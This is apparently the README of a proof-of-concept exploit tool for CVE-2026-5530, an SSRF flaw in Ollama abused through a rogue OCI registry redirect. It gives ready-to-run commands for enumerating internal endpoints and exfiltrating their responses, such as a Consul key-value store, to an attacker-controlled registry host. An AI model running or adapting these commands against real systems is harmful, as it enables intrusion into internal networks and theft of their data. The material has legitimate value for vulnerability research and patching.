## https://sploitus.com/exploit?id=157E1612-62BB-560A-A102-9D72335F5D72
# CVE-2026-5530
Ollama SSRF via OCI registry redirect with full response exfiltration.
Writeup: https://davidrochester.com/posts/cve-2026-5530
## Disclosure
Ollama was contacted multiple times with no response.
## Usage
Three modes: enum, exfil, and probe.
### Enum
Finds live internal endpoints reachable from the Ollama host.
```
python3 poc.py targets.txt --registry-host
```
### Exfil
Exfiltrates SSRF responses when you know the response size.
```
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host
```
### Probe
Binary searches for the response size automatically, then exfils.
```
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host
```
## Options
```
target URL or file of URLs (one per line, # for comments)
-p, --port rogue registry port (default: 9999)
--exfil-port exfil registry port (default: 10000)
--exfil exfil mode, requires --size
--probe binary search for size, then exfil
--size Content-Length (required with --exfil)
--registry-host your attacker IP/hostname that Ollama can reach
--ollama Ollama API URL (default: http://127.0.0.1:11434)
```